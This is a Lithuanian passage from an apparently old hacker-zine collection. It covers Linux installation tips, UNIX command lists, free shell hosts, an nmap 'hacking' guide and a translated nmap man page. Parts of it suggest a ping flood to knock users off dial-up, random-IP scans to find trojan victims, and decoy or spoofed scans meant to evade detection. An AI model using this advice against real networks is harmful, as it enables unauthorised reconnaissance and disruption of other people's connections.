skirsite siam skirsnui vietos tuo geriau.Beje, patarimas: Is karto apgalvokite ko jus norite, kiek viskas gali uzimti ir t.t., nes:1.jei skirsnis (ypac /tmp) koks prisikemsa tai tada linux`as veikia kaip ant 386.(dazniausiai isvis luzhta)2. Persigalvojus nera jau taip lengva perskirstyri diska. Jei vienam skirsni pritruko vietos, o kitam jos yra, nubus lengva is vienoskirsnio vieta perduoti kitam.Mano disko suskirstymas atrode taip:/ 150 MB – slesas reiskia root particija./tmp 100 MB – tmp particija100 MB – swap particija neturi mount point`o (pavadinimo pvz. /; /tmp ir t.t)./home 300 MB – vartotojams skiriau 300 MB (turint omeni, kad ju bus tik du)./usr 3 GB- skyriau visa likusia disko vieta, nes zinau kad xwindows ryja vieta, o jei noresiu dar ir StarOffice.Beje, visi skirsniai turi buti Linux Native failu sistemos, tik swap turi buti Linux Swap failu sistemos.Suskircius diska lieka tik menkniekiai: nurodyti kuriuos paketus instaliuoti, nurodyti tam tikra savo hardware bei jos parametrusbei ivesti galiausiai root slaptazodi.Is viso sito dar reiktu isskirti lilo konfiguravima. LILO (linux loader) yra programa kuri pasileidzia pries os uzkrovima ir pati uzkraunalinux, dos ar kita OS. Jei jusu Linux root skirsnis yra daugiau negu 500 MB nuo disko pradzios LILO (naujoms LILO versijoms giliai nusisivilpt tas 1024-as cilindras-dek kur nori) turite deti i MBR (master boot record), kitais atvejais galite deti kitur. Beto galite nurodyti kokia OS krauti pagal nutylejima, kokios bus OS zymes (Linux pagal nutylejima buna “linux”, windows- “dos”). Taigi jus jau Linux instaliavote i savo kompiuteri. Kaip ji pakrauti? Kai ijungiate kompiuteri isvystate kazka panasaus i:LILO:Ten surenkate norimos OS zyme ir spaudziate enter. Jei zymiu nezinot ar nepamenas paspauskoit tab ir jas isvysit.

4. Linux komandos

Is pirmo zvilgsnio Linux konsole yra tas pats kas ir DOS. Bet is tikro jos labai skiriasi. Konsoleje galime daryti visata pati ka ir DOS bei daug daug daugiau: kurti gerus sistemos scenarijus (skriptus), konfiguruoti Linux etc.Cia pateikiu keleta Linux komandu be kuriu darbas su Linux negalimas:cd (change directory)- pakeiskti aktyvu kataloga, dos analogas cd.(atminkit kad Linux yra skirtumas tarp didziuju ir mazuju raidziu)pwd (print working directory)- parodo aktyvu kataloga.ls- isveda aktyvaus katalogo failu ir katalogu sarasa.rm- istrina kataloga.chsh (change shell)- keitce user`io shellpasswd – pakeicia userio slaptavardiman (manual)- parodo komandos ar ko kitko aprasyma (manual).linuxconf – linux sistemos konfiguravimas. [ne komanda, o programa, kitur gali nebut]setup- linux paketu konfiguravimas, laiko, peles, garso kortos nustamas it t.t.

Kiti dalykai kurie pravers: ~ (tilde) – resikai jusu home kataloga. Tad jei norite gristi i savo home kataloga galite rasyticd /home/tavo_useris/ arba cd ~. Na o jei rasysite cd ~user, tai jus busite perkeltas i user userio kataloga.

5. Linux konfiguravimas

Zinot Linux programuotoju posaki: “Kam programuoti jeigu galima konfiguruoti?”. Taigi Linux daug ka reikia atlikti paciam. Visi Linux konfiguraciniai failai yra /etc kataloge arba jusu home kataloge. Tu failu yra daugelis, tad as paminesiu tik keleta:/etc/passwd – saugo informacija apie Linux vartotojus, ju home katalogus, shell`a ir kt./etc/shadow – saugo uzkuodotus vartotoju slaptazodzius..bachrc, .bashprofile – bash (Bourne Again SHell) shell`o konfiguraciniai failai.Kaip konfiguruoti Linux placiau suziosite skaitydami how-to arba manual.

6. Kas yra xwindow?

xwindow yra grafinis linux apvalkalas (X Window linuxistai vadina XFree86, o tikrasis X Windows yra skirtas UNIXUI ir kitiemspobrangiem *IX’ams, jis juk ne nemokamas ), kuris leidzia dirbti su Linux vizualiomis priemonemis. X Window System, sutrumpintai vadinama X Window arba tiesiog X, yra paremta kliento/serverio architektura. X serveris – grafikos, klaviaturos bei peles draiveriu visuma, leidzianti kelioms programoms (X klientams) rodyti bet ka atskiruose, gal but persidengianciuose languose. Pavyzdiai: XFree86 serveriai (XF86_SVGA, XF86_S3 ir t.t.), Metro X, Accelerated X. Visi X klientai yra lygus, bet vienas is ju lygesnis uz kitus. Jis vadinasi window manageriais. Window managerio paskirtis – duoti kiekvienam langui remeli su pavadinimu, pora arba kelias desimtis mygtuku (uzdarymo, padidinimo ir t.t.), jis pirmas apdoroja klaviaturos bei peles paspaudimus ir leidzia langus nesioti, didinti, iskelti i prieki, aktyvuoti ir taip toliau. Pavyzdiai: Enlightenment, kwm (i KDE), fvwm, Window Maker etc. Toliau lieka tik vartotojo programos. Jos, zinoma, galetu pacios keistis su X serveriu zemo lygio komandomis, bet daugpaprasciau naudoti pilnavertes bibliotekas. Sios biliotekos suteikiaivairiu standartiniu irankiu (vadinamu ‘widget’) – mygtuku, scrollbaru ir t.t. Pavydziai: Xaw (Athena Widget Set), Xaw3d, Motif, Gtk+, Qt. Galu gale beliko desktopai. Desktopo paskirtis – suteikti ivairioms programoms vienoda isvaizda ir naudojima (‘look and feel’). Paprastai desktopa sudaro biblioteka, window manageris ir kruvele bendros paskirties programu (paleidimo panele, failu tvarkykle ir t.t.). Pavyzdiai: CDE, KDE, Gnome.

Galvojo ir bade si teksta SaTaN, koregavo LivDea.

34. UNIX Naujokams

By Craft[Eye] www.underground.lt CraftEye@gmx.net

TAIGI FREE SHELLS(kai kuriu yra puslapiai, kai kuriems rashote newuser shelle prisijunge su telnet per 23 porta):

havoc.net – Niekas IRC botu neleis det.

pooki.smartec.com – Truputi letas.

nether.net – Labai gerai zhinomas. Taip pat labai uzhbaigtas, su juo gausite 3 megabaitus vietos. Telnete surinkite newuser.

nyx.net Turesi nusiusti maila tam, kad uzhsiregistruotum. Negausi daug vietos diske.

suburbia.net Sysadminai parashe tinklo skaneri – ‘Strobe’.

cyberspace.org Originalus shellas – pradedantiesiems bus grazhus menu.

Ashpool.com Hmm shellas. =]

Arbornet.org Meshlas

TakiWeb.com Dar vienas shellas.

Kai kurios UNIX komandos ir trumpas aprashymas…

alias – leidzhia vartotojui pamatyti esamus aliasusbdiff – sujungia du didelius failusbfs – skanuoja dideli failacal – parodo kalendoriucat – parodo failo turinicc – c programavimo kalbos kompiliatoriuscd – keicia direktorijachgrb – keicia failo priklausomybe grupeichmod – keicia failo atributuschown – keicia failo priklausomybe useriuicmp – palygina du failuscomm – sujungia du failus taip kad vienodos eilutes butu pashalinamoscp – kopijuoja faila i kita vietacu – iskviecia kita unix sistemadate – parodo tikslu laika ir datadf – parodo visus prijungtus irenginius tavo mashinojediff – ishspauzdina dvieju failu skirtumusdu – parodo direktorijos ishnaudojima vieta blokaisecho – ishveda teksto eiluteed – paprastas tekso redaktoriusenv – nustato aplinkos kintamuosiusex – tiesiog kitas teksto redaktoriusexpr – apsluates a mathmatical formulafind – randa failaf77 – fortrano programavimo kalbos kompiliatoriusformat – paruoshia diskeligrep – ieshko duomenu tekstehelp – parodo pagalbakill – sustabdo veikianti processaln – sukuria nuoroda tarp dvieju failulpr – kopijuoja faila i paralelini printerils – parodo visus failus ir katalogus esanchius direktorijojemail – leidzhia vartotojui siusti/gauti pashtamkdir – sukuria direktorijamore – ishveda duomeu faila i ekranamv – naudojamas tam, kad pervardintu ar perkeltu direktorijasnohup – leidzhia komandai veikti net tada kai tu isheini ish shellonroff – naudojamas tam, kad formatuoti tekstapasswd – pakeichia tavo passwordapkgadd – instaliuoja nauja programa tavo mashinojeps – parodo shiuo metu dirbanchius procesuspwd – parodo aktyvia direktorija kurioje tu dirbirm – trina nurodyta failarmdir – trina nurodyta direktorijaset – parodo visu kintamuju esanchiu shell’e vardussetenv – nustato aplinkos kintamuosiusleep – padaro veikenti procesa neaktyvusource – leidzhi paleisti faila ir pakeisti bet kurias pasikeitusiasreikshmes failesort – surushiuoja failusspell – ieshko rashybos klaidu norodytame failesplit – padalina failastty – nustato terminalo parametrustail – ishspauzdina failo galatar – nukopijuoja visus nurodytus failus i vienatouch – sukuria nauja tuschia faila arba nustato laika/data failuitroff – ishveda suformatuota ishvesti =]tset – nustato terminalo tipaumask – nurodo nauja sukurimo mask’auniq – palygina du failusuucp – unix i unix paleidimasvi – editorius per visa ekranavipw – atidaro vi editoriu taip kaip password fiaila redagavimuivolcheck – patikrina ar yra prijungtas diskelis prie tavo mashinoswc – skaichiuoja failo, zhodzhius, eilutes ir t.t.who – informacija apie kita zhmogu onlinewrite – nusiunchia zhinute kitam vartotojuisleep – nieko nedaro tam tikra laiko tarpalogname – parodo logo vardadd – vygdo keitimus kopijuojantdu – parodo kiek vietos sunaudotamount – montuoja failines sistemascut – ishtraukia pasirinktas failu dalisfold – perkelia ilgas eilutesjoin – apjungia eilutes ish skirtingu failuod – dvejetainis dampaspaste – apjungia failu eilutespr – skaido failus i puslapiussort – rushiuoja duomenis failuosestrings – ishgauna teksta ish failosum – skaichioja galutine kotroline sumatr – keichia simboliusbasename – ishgauna failo varda ish pilno keliodirname – ishgauna direktorijos varda ish pilno keliofalse – grazhina reikshme false(nedaro nieko :)true – grazhina reikshme true(nedaro nieko :)groups – ishveda duomenis apie vartotoju priklausomybe grupemshostname – parodo tikslius duomenis apie vartotojanice – nustato esamo proceso prioritetapathchk – patikrina keliusprintenv – ishveda aplinkos kintamuosiusstty – parodo arba pakeichia terminalo parametrussu – ledzhi tapti kitu vartotojutee – sukuria keleta ishvedimo kanalutest – patikrina faila ir simboliu eilutetty – ishveda terminalo pavadinimauname – ishveda duomenis apie operacine sistema ir pan.users – parodo dabar esanchius vartotojus prisijungusius prie sistemoswho – pasako kokie vartotojai uzhregistruti ir t.t.whoami – parodo kas per vienas(velnias;) tu esiman – parodo pagalba apie, bet kuria komanda – dazhniausiai naujoku naudojamakomanda =]! – pakartoja komandas——————————————————————————Network komandos:

telnet – telnetas tavo shellewho – parodo kas yra prisijunges prie LANnetstat – prisijungimu statistikosfinger – informacija apie tinklo vartotojusping – skirta tikrinti ar yra ryshys su tam tikra mashina(daugelis naudoja ja kokiams nors serveriui pakabinti ar ishmesti ish dial-up, jei greitas ryshys tai suvede komanda ping -c 50000 127.0.0.1 tikriausiaidial-up niekada neatlaikys =)ftp – leidzhia parsisiusti/siusti failuswhois – informacija apie interneto mazgusnslookup – more informacija apie interneto mazgusdig – tas pats kas ir nslookup tik dar daugiau, jei panaudosite tinkamus raktus galite ishtraukti neblogos informacijos

—————-End Of Commands List

Na zhodzhiu dabar jau palieku ash jus vienus ir darykit ka jus norit su tuo UNIX – svarbiausia darykit…

Na shiam kartui tiek….

Craft[Eye] : UNIX rulezz if you rule UNIX =]EOFGeneral Protection Fault…. Kernel Panic…

35. Nmap’o panaudojimas hack’o tikslais

1.InfoJei rimčiau susidomėsite darbu su nmap’u, tuomet būtinai apsilankykite siame saite:http://www.insecure.org/nmap.

2.Kas yra nmap’as ?

Nmap’as tai tinklo skenavimo programa.Jo pagalba jūs galite tikrinti savo, bei kitų tinklų saugumą.Tiksliau jūs galite skanuoti portus, bei suzinoti ar juos dengia koks nors firewall’as.Taip pat galima su nmap’u galima nustatyti kito kompiuterio operacinę sistemą, tereikia tik ip adreso ir aišku interneto ryšio.

3.Trūkumai ir bugai

Daugumą šiame dokumente aprašytas funkcijas galima atlikti tik iš root’o.Tai galima sakyti yra pats didžiausias šios programos trūkumas ar bugas.

4.Pradedam

Dokumentas parašytas pagal 2.3BETA14 versiją.Primiausia reikia atsisiūsti šia programą.O poto atlikti šiuos veiksmus:

# cp nmap-2.3BETA14.tar.gz /usr/local/src# cd /usr/local/src/# gunzip nmap-2.3BETA14.tar.gz# tar -xvf nmap-2.3BETA14.tar# rm nmap-2.3BETA14.tar# cd nmap-2.3BETA14/# more INSTALL# ./configure && make && make install# rm -rf nmap-2.3BETA14/

Lets go !

5.Komandų sintaksė yra tokia

# nmap [skanavimo tipas(ai)] [opcijos]

5.1. Skanavimo tipai

Manau šis tipas hackeriams beveik nereikalingas.Nmap’as jungiasi prie kiekvieno-sT porto iš eilės.Todel viskas loginama loguose ir tave tikrai suseks.Šis būdas yra tiksliausias bet ir pavojingiausias.TCP connect skanavimas.

Šis būdas jau saugesnis tačiau ne visada , pvz jei stovi firewall’as.Skanuojant tokiu būdu -sS nėra padaromas TCP prisijungimas, o paprasciausiai nusiunciamas TCP SYN paketas kaip norint prisijungti ir laukiama atsakymo.TCP SYN skanavimas.

-sF, -sX, -sN Tai saugesnis už TCP SYN skanavima bet turi vieną labai rimtą trūkumą.Nei vienas iš jų neveikia Microsoft sistemoms.Stealth FIN, Xmas Tree bei Null skanavimo režimai.

-sU UDP portų skanavimas, beprasmiškas naujoms sistemoms.Ir trunka labai ilgai.

5.2 Bendrosios opcijos ( Štai ir pats smagumas prasideda)

-P0 Skanuoja išarto nebandęs prieš tai pinginti hosto.Reikalingas tokiems servams kurie neatsakinėja į ICMP echo request’us ( pvz. pop.takas.lt)

-O Zjbiškiausia nmap’o funkcija.Atpažįsta kompo OS pagal jo fingerprint’us.

-oN Viską kas vyksta ekrane logina i nurodytą failą.

-iR Dar viena labai cool nmap’o funkcija.Pats nmap’as generuoja bet kokius ip adresus ir skanuoja nurodytus portus.Jei ieškote kokiu trojanų auku tiesiog rašykite nmap -sS -iR -p 1234(portas) 127.0.0.1.

-p Galite nurodyti kuriuos ar kurį portą tikrinti.-p 21,60-90,1243 — 21, visi nuo 60 iki 90 bei 1243 port

-D

Decoy skanavimas priverčia skanuojamą host’ą manyti, kad jį vienu metu skanuoja visi nurodyti decoy’iai. Hostų logai gali parodyti 5-10 skanavimų is unikalių IP adresų, bet kuris iš jų skanuoja iš tikro jie pasakyti negalės.

Reikia atskirti vien1 decoy nuo kito kableliais be tarpo, tarp jų gali įrasšyti ME, tai bus tavo IP adresas.Jei neįrašysi ME, tai nmap’as parinks vietą tavo IP pats.

Tik reikia prisiminti, kad decoy įrašyti hostai turi būti gyvi, kitaip gali uz-SYN-flood’inti taikinį.Beto labai nesunku bus surasti tave, jei tik tavo IP bus gyvas iš visų decoy’ų.

Reikia pasakyti kad kai kurie portų skanavimo detektoriai gali išviso uždrausti priėjimą skanuojantiems hostams.Todėl būtų linksma jei kartą nurodytumėt vieną iš decoy’ų pvz. 127.0.0.1

Decoy gali būti naudojamas kartu su ping, tikru portų skanavimu ar su OS nustatymu (-O).

-S Kartais nmap’as gali nerasti jūsų adreso.Tokiu atveju galima naudoti -S funkciją su jūsų IP ir interfeisu kuriuo norite siūsti paketus.

Tokiu būdu galite nurodyti kieno nors kito ip adresą ir isdurti taikinį,

-e Interfeisas Pvz. eth0, lo, ppp0 ir kt.

-g Nurodo is kokio porto skanuoti.

-T

Paranoid pats lečiausias skanavimo būdas, bet ir tiksliausias, Insane pats greičiausias, tačiau ne toks tikslus.

5.3.Pavyzdžiai

# nmap -sX -e lo -P0 -S 127.0.0.3 localhost

Xmas Tree būdu aš skanuoju savo localhost’ą apsimesdamas 127.0.0.3.Loopback interfeisu.Va kąrodo ipchains’ų logas:

Packet log: input DENY lo PROTO=6 127.0.0.3:37009 127.0.0.1:139 L=40 S=0x00 I=53682 F=0x0000 T=41 (#1)

Kernelis įsitiknęs kad jį skanuoja 127.0.0.3.

# nmap -sN -D microsoft.com,mail.takas.lt,ME -oN /tmp/mad -p 1-1024 -O mad.com

Null skanavimo režimu , panadodamas du decoy adresus, viską logina į /tmp/mad failą.Skanuoja

nuo 1-1024 portus ir bando atspėti OS mad.com serverio.

6.Pabaigai

Na pvyzdžių man atrodo daug nereikia jei turite lakią fantaziją jų prisigalvosite patys.

Wrote by Z-Man (z-man@scientist.com)

Nmap network security scanner man page (Lithuanian translation)

36. NMAP (2)

PAVADINIMAS nmap – tinklo tyrinėjimo įrankis bei saugumo skeneris

SINTAKSĖ nmap [skanavimo tipas(ai)] [opcijos]

APIBŪDINIMAS nmap’as yra sukurtas tam, kad leistų sistemų administrato­ riams bei smalsiems individams skanuoti didelius tinklus, siekiant nustatyti kokie hostai yra veikiantys ir kokias paslaugas jie siūlo. nmap’as turi be galo daug skanavimo technologijų, tai: UDP, TCP connect(), TCP SYN (pusiau atviras), ftp proxy (bounce ataka), Reverse-ident, ICMP(ping sweep), FIN, ACK sweep, Xmas Tree, SYN sweep, bei Null skan’as. Skanavimo Tipai sekcijoje rasite apie tai smulkesnės informacijos. nmap’as taip pat turi nemažai pažangių savybių, tokių kaip nutolusio kompiuterio (toliau vadinamo ‘remote’) (O)peracinės (S)istemos nus­ tatymas per TCP/IP fingerprintinima, stealth (vogtinis) skanavimas, dinaminės pauzės ir retransimisijos skaičiavi­ mai, lygiagretusis skanavimas , nepasiekiamų host’ų nus­ tatymas skanuojant lygiagrečiu skanavimo metodu, decoy skanavimas, filtruojamų portų nustatymas, tiesioginis RPC skanavimas, fragmentinis skanavimas, bei labai lankstus taikinio ir portų nurodymas.

nmap’o autorius stengiasi kaip galima daugiau įvairių nmap’o galimybių suteikti ne tik root vartotojui, bet ir paprastam sistemos vartotojui, deja daugėlis kritinių sis­ temos branduolio (kernel) interfeisų (tokių kaip “raw socket’ai”) reikalauja root’o privilegijų, todėl nmap’as turėtų būti naudojamas root’u kai tik įmanoma.

nmap’o naudojimo rezultatas dažniausiai būna paprasčiau­ sias sąrašas įdomių portų, rastų skanuojamoje mašinoje(se). Nmap’as visada parodo kokią paslaugą (ser­ vice) teikia portas, jo numerį, būseną bei protokolą. Būsaną nusako vienas iš trijų žodžių: “open”, “filtered”, “unfiltered”. “open” (atviras) reiškia, kad taikinys leis prisijungti prie šito porto. “filtered” (filtruojamas) reiškia, kad firewall’as (ugnies siena), filtras ar dar kažkoks įdomus įrankis dengia portą, dėl to nmap’as tikl­ siai negali nustatyti ar portas atviras. “unfiltered” (nefiltruojamas) parodo, kad portas yra tikrai “closed” (uždarytas) ir nera dengiamas jokio firewall’o/filtro. Nefiltruojamas portas yra gan įprastas atvėjis ir yra rodomas tik tuo atveju, kai dauguma iš skanuotų portų yra filtruojami.

Priklausomai nuo to, kokios opcijos naudojamos, nmap’as taip pat gali parodyti ir nutolusio kompiuterio: (O)peracinę (S)istemą, TCP susekamumą, vartotoju vardus, kuriems priklauso tam tikri procesai, DNS vardus ir dar vieną kitą.

OPCIJOS Prasmingos opcijos visos gali būti rašomos kartu (t.y. vienoje eilutėje). nmap’as stengsis pasakyti, kokias klaidas esate padarę (aišku jei esate :).

Jei esate nekantrus, galite iškarto šoktelti į sekciją pavyzdžiai gale dokumento, kur gan aiškiai parodo naudo­ jimą. Taip pat galite paleisti nmap -h ir pamatysite pagrindines opcijas, su trumpais aprašymais.

SKANAVIMŲ TIPAI

-sT paprasčiausias TCP connect() skanavimas. Jūs ban­ dote prisijungti prie kiekvieno porto iš eilės. Jei portas klausosi, nmap’as prisijungia prie jo, taigi jei host’as logina, jis matys, kad bandote jungtis. Šis metodas yra tiksliausias, bet rekomenduočiau jį naudoti tik tuo atveju, jei skanuojate savo ar draugo kompiuterį, t.y. tokį, dėl kurio vėliau tikrai nesusilauksite nemalonumų.

-sS TCP SYN skanavimas, kitaip dar dažnai vadinamas kaip “pusiau-atviras” skanavimas, nes nėra padaro­ mas TCP prisijungimas. Jūs paprasčiausiai nusiunčiate TCP SYN paketuką kaip kad norėdamas prisijungti ir laukiate atsakymo. Pakankamai neblo­ gas metodas, bet jei yra filtruojamų portų (pvz. pastatytas firewall’as) ir host kompiuteris juos logina, – būsite pastebėtas.

-sF -sX -sN Stealth FIN, Xmas Tree bei Null skanavimo režimai. Tai yra šiek tiek saugesni skanavimo būdai nei TCP SYN (pastebimumo atžvilgiu), bet deja nei vienas iš jų neveikia M$ sistemoms. Iš kitos pusės, tai nebloga priemonė, kurios pagalba galima nustatyti ar tai M$ sistema ar ne, t.y. jei -sF -sX arba -sN parodo, kad visi portai uždaryti, o -sS rodo kelis atvirus portus, taikinys greičiausiai windows dėžutė.

-sP Tai paprasčiausias ping’as, kuris parodo kurie hostai tinkle yra gyvi. Atliekama paprasčiausiai siunčiant ICMP echo prašymą (request). Deja kai kurie saitai (kaip mail.takas.lt) blokuoja prašymus. Kad iš tikro įsitikinti, ar hostas negy­ vas, nmap’as nusiunčia ir TCP ack paketuką į 80 (standartiškai) portą. Jei gauname atgal RST, reiškia hostas gyvas. Pagal standartą (r00t’ui) nmap’as naudoja abu ICMP bei ACK metodus. Pakanka­ mai efektyvu, nes vienu metu galite patikrinti #n hostų.

-sU UDP skanavimas. Naudojamas tam, kad nustatyti kokie

UDP (User Datagram Protocol, RFC 768) portai yra atviri.

Kai kurie mano, kad UDP skanavimas yra beprasmiškas, bet jį prisiminti verta vien dėl vienos Solaris rcpbind skylės. Taip pat yra cDc Back Orifice trojanas, kuris atsidaro UDP portą ant window’sų. Gaila tik, kad UDP skanavimas kartais gali trukti labai ilgai.

-sA ACK skanavimas: šitas metodas paprastai yra naudo­ jamas tam, kad išsiaiškinti firewall’ų (ugnies sinų) taisykles. Jis gali padėti nustatyti ar fire­ wall’as tikras, ar paprasčiausias paketų filtras, blokuojantis įplaukiančius SYN paketukus.

-sW Window skanavimas. Šis skanavimo būdas labai panašus į ACK skaną, skirtumas tik tas, kad šis skanavimo metodas kartais parodo ir atvirus portus (ACK jų nerodo).

-sR RPC skanavimas. Praskanavus parodoma kokia programa ir jos versija laiko RPC portus atvirus.

-b Dar vienas pakankamai originalus skanavimo būdas, t.y. pasinaudojant ftp proxy serveriu. formatas gali būti useris:passwor­ das@serveris:portas . Viskas išskyrus serverį yra nebūtina.

BENDROSIOS OPCIJOS Nei viena iš šių nėra būtina, bet kai kurios gali būti pakankamai naudingos

-P0 Skanuoti iš kart, nepabandžius iš pradžių ping’int serverio. Tai naudinga skanuojant tokius kaip mail.takas.lt, kurie neatsakinėja į ICMP echo request’us. Tokiu atveju reikėtų naudoti -P0 arba -PT80.

-PT Naudoti TCP “ping’ą” vietoje standartinio ICMP ping’o. Naudinga tokiais atvejais, kai serveris neatsakinėja i ICMO echo request’us. Taip pat gal­ ima naudoti kartu su postu (-PT).

-PS Naudoja SYN (prisijungimo prašymą) vietoje ACP

-PI Paprastas ping’as + suranda subnet’o broadcast’u adresus tinkle.

-PB Standartinis ping’inimo metodas: naudoja ACP bei ICMP ping’us kartu. Geriausia būdas patikrinti firewall’us, kurie blokuoja vieną iš jų.

-O Viena geriausių nmap’o ypatybių – serverio OS’o atpažinimas pagal jo fingerprint’us (jei atvirai, pats nelabai žinau kas per biesas tie finger­ printai).

-I Įjungiamas TCP reverse ident skanavimas. Kaip 1996 Dave’as Goldsmith’as pastebėjo, ident protokolas (rfc 1413) leidžia pamatyti, kokiam useriui prik­ lauso procesas, kuris naudoja TCP susijungima. Taigi, tu gali pvz prisijungti prie 80 porto ir tada pasinaudojes inentd’u, gali pamatyti ar http serveris yra paleistas root’u ar kokiu kitu userium.

-f Skanuojant SYN (-sS) , FIN (-sF), XMAS (-sX) arba NULL (-sN) metodu, naudojami labai mažyčiai sufrag­ mentuoti IP paketai.

-v Verbose mode. Labai rekomenduojama opcija, ypač jei norit geriau suprasti kas čia dedasi. naudodamas šią opciją du kartus, efektas bus dar geresnis. Gali naudoti ir dvigubą -d, efektas – nerealus. Nepabandęs, nesuprasi.

-h Jei norite kad nedidelis langelis jums trumpai primintu kelias pagrindines komandas, ši opcija – jums.

-oN Viskas, kas vyksta ekrane bus loginama į “logas” failą.

-oM Viskas, kas vyksta ekrane bus loginama į failą “logas” “šiek tiek” kitokiu formatu.

-oS Logina į failą “logas” kažkokiu nauju s| Skanavimas, kuris buvo nutrauktas su ^C, gali būti pratęstas, su sąlyga, kad viskas buvo loginama su -oN arba -oM opcija. Daugiau jokie parametrai negali būti pateikti (jie bus tokie, kokie buvo naudojami loginant). nmap’as pradės skanuoti nuo sekančios mašinos, po tos, kuri paskutinė buvo sėkmingai nuskanuota..

-iL Nuskaito hostus (IP adresus) iš failo “failas”. Hostai faile turi būti atskirti tarpais, TAB’ais arba atskirose linijose. deja opcijų nurodyti jokių negalite tame faile, užtat yra galimybė jas nurodyti komandinėje eilutėje.

-iR Šita opcija priverčia nmap’ą generuoti atsitik­ tinius hostus. Jei kada neturėsite ką veikti, pabandykite `nmap -sS -iR -p 80′, kad surastumėte keletą www serverių.

-p Galite nurodyti kurį/kuriuos portus tikrinti. pvz. -p 110 patikrins ar hostas turi pop3 serverį, taip pat galite mišriai nurodinėti portus:

-p 21,60-90,1243 — 21, visi nuo 60 iki 90 bei 1243 portas -p 1- — visi portai nuo 1 iki 65535.

-F Greitasis metodas. Skanuoja tik tuos portus, kurie nurodyti nmap’o services faile (pagal default’ą – /usr/local/lib/nmap/nmap-services)

-D Decoy skanavimas priverčia skanuojamą host’ą manyti, kad jį vienu metu skanuoja visi nurodyti decoy’iai. Hostų logai gali parodyti 5-10 skanavimų iš unikalių IP adresų, bet kuris iš jų skanuoja iš tikro jie pasakyti negalės.

Atskirk kiekvieną decoy’į kableliais (be tarpo) ir gali tarp jų įterpti ‘ME’ kaip vieną iš decoy’ių. nmap’as ten įterps tavo adresą. Jei šito nenurodysi, nmap’as atsitiktinai išrinks tau vietą. Tiesa, jei ‘ME’ įrašysi 6-oje ar dar vėlesnėje vietoje, kai kurie skanavimų detektoriai (tokie kaip Solar Designer’io nepakartojamas scanlog dae­ mon’as) gali tavo IP išviso neparodyti.

Nepamiršk, kad hostai, kuruos naudosi kaip decoy’ius, turi būti gyvi, kitaip gali už-SYN- flood’inti taikinį, o be to labai nesunku bus surasti skanuotoją, jei jis bus vienintelis gyvas visame tinkle.

Atkreipk dėmesį ir į tai, kad kai kurie (durnesni) portų skanavimų detektoriai gali aplamai skanuo­ jantiems host’ams uždrausti priėjimą. Įsivaizduok, kas gali nutikti, jei vieną iš decoy’ių nurodytum “localhost’ą” 🙂

Decoy skanavimas gali būti naudojamas kartu su ping (naudojant ICMP, SYN, ACK, ar dar ką nors) arba tikru portų skanavimu bei bandant surasti remote OS’ą ( -O ).

-S Kartais nmap’as gali nerasti jūsų adreso. Tokiu atveju galite naudoti -S opciją su jūsų IP adresu bei interfeisu, kuriuo siūsite paketus.

-e Nurodo nmap’ui kokiu interfeisu siųsti paketus. (lo, ppp0, eth0 ir etc.)

-g Nurodo iš kokio porto skanuoti. Daugelis firewall’ų bei filtrų padaro išimtis DNS (53) bei FTP-DATA (20) paketams.

-r Nurodo nmap’ui portus skanuoti NE atsitiktine tvarka.

-M Nustato naksimalų susijungimu skaičių, kuris bus naudojamas paralelėje su TCP(standartiškai) skanav­ imu.

LAIKO APRIBOJIMAI

-T Paranoid – pats lėčiausias skanavimo būdas, Insane – pats greičiausias, deja ne toks tikslus, ypač jei tinklas lėtas. Vietoj žodžių galite naudoti ir -T (0-5), kur 0 == Paranoid, 1 == Sneaky ir t.t.

–host_timeout Nurodo kiek laiko nmap’as gali skanuoti duotąjį IP. Laikas turi būti nemažiau nei 200 milisekundžių.

–max_rtt_timeout Kiek daugiausia laiko nmap’as gali laukti atsakymo iš skanuojamo IP.

–scan_delay Nustato minimalų laiko tarpą, kuri nmap’as turi laukti tarp bandymų. Tai naudingiausia siekiant sumažinti tinklo apkrovimą.

TAIKINIO NURODYMO BŪDAI Viskas, kas nėra opcijos, nmap’e suprantama kaip taikinys. Paprasčiausias būdas yra nurodyti konkrečius IP arba hos­ tus. Jeigu norite nuskanuoti IP adresų subnet’ą, galite pridėti /maskę hostname’ui ar IP adresui. Maskė turi būti tarp 0 (norint nuskanuoti visą internetą) ir 32 (norint nuskanuoti konkretų host’ą/IP. Naudok /24 ‘C’ klasės adresų skanavimui bei /16 ‘B’ klasės adresų skanavimui.

nmap’as taip pat turi gan patogią galimybę nustatinėti IP adresus sąrašais/atstumais. pvz. gali nuskanuoti ‘B’ klasę užrašydamas 128.210.*.* arba 128.210.0-255.0-255 arba dar 128.210.0-50,51-255.1,2,3,4,5-255 . Manau kad tai pakanka­ mai patogu ir nesudėtinga.

KELETAS PAVYZDŽIŲ nmap -sX -e lo -P0 -S 127.0.0.3 localhost

Pasinaudodamas Xmas Tree skanavimo metodu, apsimetinėdamas, kad esu 127.0.0.3 Loopback protokolu skanuoju savo localhost’ą Štai kaip atrodo ipchains’ų log’as:

Packet log: input DENY lo PROTO=6 127.0.0.3:37009 127.0.0.1:139 L=40 S=0x00 I=53682 F=0x0000 T=41 (#1)

kaip matote, kernelis yra įsitikinęs, kad jį skanuoja iš 127.0.0.3 o tai ir yra vienas svarbiausių uždavinių – likti nematomiems 🙂

nmap -sS -O target.example.com/24

stealth SYN metodu nuskanuoja visas 255 mašinas, esančias target.example.com ‘C’ klasėje. Taip pat bando nustatyti kiekvieno iš jų operacinę sistemą.

host -l company.com | cut ‘-d ‘ -f 4 | ./nmap -v -iL –

suranda visus *.company.com hostus ir atiduoda juos nmap’ui, kuris savo ruožtu įsijungęs verbose mode visus juos nuskanuoja.

nmap -sN -D microsoft.com,mail.takas.lt,ME -oN /tmp/crazy -p 1-1024 -O crazy.com

skanauoja Null skanavimo režimu, panaudoja du decoy adresus, viską logina į /tmp/crazy failą, skanuoja nuo 1 iki 1024 crazy.com portus bei stengiasi atspėti crazy.com serverio operacinę sistemą

BUGAI Vabalėliai? Kokie dar vabalėliai? Na.. jei rasit kokių, būtinai siūskit autoriui: . Pachai taip pat labai laukiami. Taip pat nepamirškite siūsti OS’ų fingerprintus, kad nmap’o autoriai galėtų plėsti duom. bazę. Apie tai smulkiau galite rasti docs/nmap-finger­ printing-article.txt dokumente arba nmap’o puslapyje: http://www.insecure.org/nmap

AUTORIUS: Fyodor fyodor@insecure.orgIŠVERTĖ: Aurimas Mikalauskas inner@dammit.lt

PLATINIMAS Naujausią nmap’o versiją visada galite rasti čia:

http://www.insecure.org/nmap/

nmap is (C) 1997,1998,1999,2000 by Fyodor fyodor@inse­cure.org

